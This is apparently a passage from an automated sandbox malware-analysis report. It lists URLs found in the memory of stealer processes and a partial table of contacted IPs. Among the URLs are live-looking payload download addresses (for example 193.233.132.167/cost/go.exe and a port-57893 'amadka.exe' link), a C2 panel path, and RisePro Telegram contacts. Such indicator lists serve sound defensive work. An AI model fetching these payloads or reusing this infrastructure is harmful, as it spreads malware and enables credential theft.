                                          https://duckduckgo.com/ac/?q=2531414c80.exe, 00000008.00000003.2242125637.0000000007CFA000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2239114261.0000000007C55000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2249859344.0000000007C5F000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2304428591.0000000007EF9000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2306217637.0000000007F21000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2347869504.0000000008820000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2298437366.0000000007A30000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2293320807.0000000007AAA000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2344760612.0000000007A30000.00000004.00000020.00020000.00000000.sdmpfalse
                                            https://ipinfo.io/FWRageMP131.exe, 0000001F.00000002.2450136740.000000000146E000.00000004.00000020.00020000.00000000.sdmpfalse
                                              http://193.233.132.139/Localexplorta.exe, 00000002.00000002.3253602072.0000000001505000.00000004.00000020.00020000.00000000.sdmpfalse
                                                https://t.tIpoRageMP131.exe, 0000001F.00000002.2450136740.0000000001515000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  https://db-ip.com/MPGPH131.exe, 00000014.00000002.2529795385.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000018.00000002.2404856512.0000000001440000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 00000006.00000003.2089816565.000002AF2A990000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      https://ipinfo.io/widget/demo/89.187.171.1322531414c80.exe, 00000008.00000002.2511321549.000000000150F000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000002.2511321549.0000000001529000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000002.2500776200.000000000170A000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2529795385.0000000000AAD000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2529795385.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000018.00000002.2404856512.0000000001440000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000018.00000002.2404856512.00000000013EF000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000001F.00000002.2450136740.00000000014F9000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000001F.00000002.2450136740.00000000014AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        http://193.233.132.167/cost/lenin.exetK2531414c80.exe, 00000008.00000002.2511321549.0000000001538000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          https://login.microsoftonline.com/ppsecure/ResolveUser.srfsvchost.exe, 0000001E.00000003.2356241086.000001EFCE563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3269339148.000001EFCDC45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2355581057.000001EFCE54D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            https://login.microsoftonline.com/ppsecure/devicechangecredential.srftsvchost.exe, 0000001E.00000002.3269339148.000001EFCDC45000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              https://t.me/risepro_botftWRageMP131.exe, 0000001F.00000002.2450136740.0000000001515000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                http://193.233.132.167/cost/go.exe2531414c80.exe, 00000008.00000002.2511321549.0000000001538000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000002.2500776200.0000000001730000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2530843183.0000000000B62000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2365629446.0000000000B62000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2529795385.0000000000B01000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  https://login.microsoftonline.com/ppsecure/deviceremovecredential.srfrsvchost.exe, 0000001E.00000002.3269339148.000001EFCDC45000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    http://193.233.132.167/cost/go.exerMPGPH131.exe, 00000014.00000002.2530843183.0000000000B62000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2365629446.0000000000B62000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issuesvchost.exe, 0000001E.00000003.2501990171.000001EFCE56E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2469731618.000001EFCE56E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2452907046.000001EFCE56E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3324393598.000001EFCE55F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        https://t.me/RiseProSUPPORTv=MPGPH131.exe, 00000014.00000003.2363329164.0000000007A11000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2539684694.0000000007A11000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2362400081.0000000007A11000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2361500183.0000000007A11000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          https://login.microsoftonline.com/ppsecure/DeviceAssociate.srf(svchost.exe, 0000001E.00000002.3269339148.000001EFCDC45000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdssvchost.exe, 0000001E.00000003.2469731618.000001EFCE56E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2488466722.000001EFCE57A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              https://db-ip.com:443/demo/home.php?s=89.187.171.1322531414c80.exe, 00000008.00000002.2511321549.0000000001538000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2529795385.0000000000A9C000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000018.00000002.2404856512.00000000013DC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                https://t.me/risepro_botisepro_botRageMP131.exe, 0000001F.00000002.2450136740.0000000001515000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  https://db-ip.com/demo/home.php?s=89.187.171.132icroso/2531414c80.exe, 00000018.00000002.2404856512.0000000001440000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAAAAAsvchost.exe, 0000001E.00000003.2452907046.000001EFCE56E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      https://login.microsoftonline.com/ppsecure/EnumerateDevices.srfsvchost.exe, 0000001E.00000003.2356241086.000001EFCE563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3269339148.000001EFCDC45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2355581057.000001EFCE54D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        https://t.me/RiseProSUPPORTqUTvMPGPH131.exe, 00000013.00000002.2500776200.000000000169D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          https://account.live.com/InlineSignup.aspx?iww=1&id=80502svchost.exe, 0000001E.00000003.2356241086.000001EFCE563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3269339148.000001EFCDC45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2355581057.000001EFCE54D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            https://t.(2531414c80.exe, 00000008.00000002.2511321549.0000000001538000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              http://193.233.132.167/cost/lenin.exe4MPGPH131.exe, 00000014.00000002.2529795385.0000000000B01000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                http://193.233.132.139/erences.SourceAumidexplorta.exe, 00000002.00000002.3253602072.0000000001505000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  https://download.iolo.net/svchost.exe, 00000006.00000002.3344029385.000002AF2AD21000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    http://193.233.132.167/cost/lenin.exepro_botCMPGPH131.exe, 00000013.00000002.2500776200.0000000001730000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      http://Passport.NET/tb_svchost.exe, 0000001E.00000002.3329736359.000001EFCECB8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3271307179.000001EFCDC5F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/scdnsvchost.exe, 0000001E.00000002.3324323127.000001EFCE537000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          https://db-ip.com/demo/home.php?s=89.187.171.132J2531414c80.exe, 00000008.00000002.2511321549.0000000001538000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            https://ipinfo.io/WMPGPH131.exe, 00000013.00000002.2500776200.00000000016DD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              https://db-ip.com/demo/home.php?s=89.187.171.132mpRageMP131.exe, 0000001F.00000002.2450136740.0000000001515000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                https://ipinfo.io/TMPGPH131.exe, 00000013.00000002.2500776200.000000000169D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  http://193.233.132.139/sev56rkm/index.phpLexplorta.exe, 00000002.00000002.3253602072.0000000001539000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    https://account.live.com/msangcwamsvchost.exe, 0000001E.00000003.2355633243.000001EFCE53B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2354397715.000001EFCE529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2356061920.000001EFCE540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2354868828.000001EFCE552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2355752534.000001EFCE557000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3269339148.000001EFCDC45000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe.exsvchost.exe, 00000006.00000002.3343648641.000002AF2AD0A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dll2531414c80.exe, 00000008.00000002.2507039187.0000000000771000.00000040.00000001.01000000.0000000C.sdmp, MPGPH131.exe, 00000013.00000002.2497729169.0000000000EE1000.00000040.00000001.01000000.0000000D.sdmp, MPGPH131.exe, 00000013.00000003.2207330993.0000000005310000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2531568064.0000000000EE1000.00000040.00000001.01000000.0000000D.sdmp, MPGPH131.exe, 00000014.00000003.2208478745.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, 2531414c80.exe, 00000018.00000003.2274624155.0000000005080000.00000004.00001000.00020000.00000000.sdmp, 2531414c80.exe, 00000018.00000002.2403293492.0000000000771000.00000040.00000001.01000000.0000000C.sdmp, RageMP131.exe, 0000001F.00000002.2448073874.0000000000D51000.00000040.00000001.01000000.00000010.sdmp, RageMP131.exe, 0000001F.00000003.2369468000.0000000005000000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=2531414c80.exe, 00000008.00000003.2242125637.0000000007CFA000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2239114261.0000000007C55000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2249859344.0000000007C5F000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2304428591.0000000007EF9000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2306217637.0000000007F21000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2347869504.0000000008820000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2298437366.0000000007A30000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2293320807.0000000007AAA000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2344760612.0000000007A30000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            http://193.233.132.139/sev56rkm/index.phpXexplorta.exe, 00000002.00000002.3253602072.0000000001539000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              http://Passport.NET/tbE%svchost.exe, 0000001E.00000003.2490135541.000001EFCEE0A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2489362309.000001EFCEE0A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                http://crl.ver)svchost.exe, 00000006.00000002.3326223152.000002AF2AC00000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  http://passport.net/tbsvchost.exe, 0000001E.00000002.3325518723.000001EFCECA3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3276271710.000001EFCDC85000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    https://t.me/RiseProSUPPORT2531414c80.exe, 00000008.00000002.2516925001.0000000007BDD000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000002.2511321549.000000000149E000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000002.2500776200.000000000169D000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2363329164.0000000007A11000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2539684694.0000000007A11000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2362400081.0000000007A11000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2539684694.00000000079D0000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2361500183.0000000007A11000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2529795385.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000018.00000002.2404856512.00000000013B8000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000001F.00000002.2450136740.000000000146E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/Issueuesvchost.exe, 0000001E.00000003.2469731618.000001EFCE56E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srfsvchost.exe, 0000001E.00000002.3269339148.000001EFCDC45000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          http://193.233.132.139/sev56rkm/index.phpcodedexplorta.exe, 00000002.00000002.3253602072.0000000001539000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            https://www.ecosia.org/newtab/2531414c80.exe, 00000008.00000003.2242125637.0000000007CFA000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2239114261.0000000007C55000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2249859344.0000000007C5F000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2304428591.0000000007EF9000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2306217637.0000000007F21000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2347869504.0000000008820000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2298437366.0000000007A30000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2293320807.0000000007AAA000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2344760612.0000000007A30000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brMPGPH131.exe, 00000014.00000003.2351242676.00000000079D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                http://147.45.47.102:57893/hera/amadka.exeaMPGPH131.exe, 00000014.00000002.2530843183.0000000000B62000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2365629446.0000000000B62000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  https://www.youtube.com/accountb3168c3d9b.exe, 0000000F.00000002.2498371280.0000000003F5A000.00000004.00000020.00020000.00000000.sdmp, b3168c3d9b.exe, 0000000F.00000003.2488602462.0000000003F64000.00000004.00000020.00020000.00000000.sdmp, b3168c3d9b.exe, 0000000F.00000003.2492388851.0000000003ECC000.00000004.00000020.00020000.00000000.sdmp, b3168c3d9b.exe, 0000000F.00000003.2446883487.0000000003E8F000.00000004.00000020.00020000.00000000.sdmp, b3168c3d9b.exe, 0000000F.00000003.2447086415.0000000003EBD000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2342118247.00000000079E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    https://db-ip.com/eRageMP131.exe, 0000001F.00000002.2450136740.0000000001515000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      http://193.233.132.139/sev56rkm/index.phpbEexplorta.exe, 00000002.00000002.3253602072.0000000001539000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        http://193.233.132.139/sev56rkm/index.php1mb3JtLXVybGVuY29kZWQ=explorta.exe, 00000002.00000002.3253602072.0000000001505000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          https://ipinfo.io/RageMP131.exe, 0000001F.00000002.2450136740.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000001F.00000002.2450136740.0000000001515000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            http://193.233.132.139/age.Streams.DataWriterexplorta.exe, 00000002.00000002.3253602072.0000000001505000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              https://www.maxmind.com/en/locate-my-ip-address2531414c80.exefalse
                                                                                                                                                                https://www.youtube.com/accountJ_b3168c3d9b.exe, 0000000F.00000003.2491026647.0000000003F53000.00000004.00000020.00020000.00000000.sdmp, b3168c3d9b.exe, 0000000F.00000002.2498371280.0000000003F5A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  http://193.233.132.167/cost/random.exeexplorta.exe, 00000002.00000002.3253602072.0000000001505000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issuesvchost.exe, 0000001E.00000002.3308028724.000001EFCDCE1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2501990171.000001EFCE56E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2469731618.000001EFCE56E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2452907046.000001EFCE56E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBLMPGPH131.exe, 00000014.00000003.2351242676.00000000079D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exesvchost.exe, 00000006.00000002.3273860235.000002AF25D02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3343648641.000002AF2AD0A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3326650125.000002AF2AC8D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3254546774.000002AF25441000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdessvchost.exe, 0000001E.00000003.2703702572.000001EFCE578000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2500832032.000001EFCE57A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            https://ipinfo.io/widget/demo/89.187.171.132v2531414c80.exe, 00000008.00000002.2511321549.000000000150F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              http://193.233.132.167/cost/go.exeAK2531414c80.exe, 00000008.00000002.2511321549.0000000001538000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                http://193.233.132.167/cost/sarra.exeexplorta.exe, 00000002.00000002.3253602072.0000000001505000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  https://t.me/risepro_botriseproURageMP131.exe, 0000001F.00000002.2450136740.0000000001515000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/Issuesuesvchost.exe, 0000001E.00000003.2501990171.000001EFCE56E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      http://193.233.132.167/mine/random.exeexplorta.exe, 00000002.00000002.3253602072.00000000014DA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        http://schemas.misvchost.exe, 0000001E.00000003.2702970756.000001EFCE55A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3324323127.000001EFCE537000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          https://ipinfo.io:443/widget/demo/89.187.171.132S2531414c80.exe, 00000008.00000002.2511321549.0000000001529000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            https://pcss.dllsvchost.exe, 0000001E.00000002.3290683644.000001EFCDC9C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              https://t.me/risepro_botHMPGPH131.exe, 00000013.00000002.2500776200.0000000001730000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trustcesvchost.exe, 0000001E.00000002.3324323127.000001EFCE537000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  http://193.233.132.139/sev56rkm/index.php001explorta.exe, 00000002.00000002.3253602072.00000000014F4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf:CLSIDsvchost.exe, 0000001E.00000003.2354605983.000001EFCE510000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      https://login.microsoftonline.com/ppsecure/deviceremovecredential.srfsvchost.exe, 0000001E.00000003.2354605983.000001EFCE510000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        https://login.microsoftonline.com/ppsecure/DeviceUpdate.srfLsvchost.exe, 0000001E.00000002.3269339148.000001EFCDC45000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          http://147.45.47.102:57893/hera/amadka.exe2531414c80.exe, 00000008.00000002.2511321549.0000000001538000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000002.2500776200.0000000001730000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2530843183.0000000000B62000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2365629446.0000000000B62000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2529795385.0000000000B01000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            https://ipinfo.io/widget/demo/89.187.171.132yBRageMP131.exe, 0000001F.00000002.2450136740.00000000014AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAAsvchost.exe, 0000001E.00000003.2452907046.000001EFCE56E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                https://login.microsoftonline.com/ppsecure/DeviceQuery.srfsvchost.exe, 0000001E.00000003.2356241086.000001EFCE563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3269339148.000001EFCDC45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2355581057.000001EFCE54D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  http://schemas.xmlsoap.org/soap/envelope/svchost.exe, 0000001E.00000002.3324393598.000001EFCE55F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    https://db-ip.com/2MPGPH131.exe, 00000013.00000002.2500776200.0000000001730000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      http://147.45.47.102:57893/hera/amadka.exeHK2531414c80.exe, 00000008.00000002.2511321549.0000000001538000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=2531414c80.exe, 00000008.00000003.2242125637.0000000007CFA000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2239114261.0000000007C55000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2249859344.0000000007C5F000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2304428591.0000000007EF9000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2306217637.0000000007F21000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2347869504.0000000008820000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2298437366.0000000007A30000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2293320807.0000000007AAA000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2344760612.0000000007A30000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trustsvchost.exe, 0000001E.00000002.3324323127.000001EFCE537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3324393598.000001EFCE55F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            http://193.233.132.139/sev56rkm/index.phpWindowsexplorta.exe, 00000002.00000002.3253602072.00000000014F4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              https://login.microsoftonline.com/MSARST2.srfsvchost.exe, 0000001E.00000003.2355633243.000001EFCE53B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2356061920.000001EFCE540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2356241086.000001EFCE563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3271307179.000001EFCDC5F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                https://account.live.com/inlinesignup.aspx?iww=1&id=80600esvchost.exe, 0000001E.00000002.3269339148.000001EFCDC45000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  http://Passport.NET/STSsvchost.exe, 0000001E.00000003.2923000049.000001EFCE589000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2501990171.000001EFCE56E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2469731618.000001EFCE56E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2452907046.000001EFCE56E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2905634199.000001EFCE581000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2905520461.000001EFCE57F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionIDsvchost.exe, 0000001E.00000002.3360389667.000001EFCEE0A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3325172143.000001EFCEC53000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      http://193.233.132.167/cost/go.exe.1MPGPH131.exe, 00000014.00000002.2529795385.0000000000B01000.00000004.00000020.00020000.00000000.sdmpfalse

                                                                                                                                                                                                                                        World Map of Contacted IPs

                                                                                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                        • 75% < No. of IPs

                                                                                                                                                                                                                                        Public IPs

                                                                                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                        193.233.132.139
                                                                                                                                                                                                                                        		unknownRussian Federation
                                                                                                                                                                                                                                        		2895FREE-NET-ASFREEnetEUtrue
                                                                                                                                                                                                                                        34.117.186.192
                                                                                                                                                                                                                                        		unknownUnited States
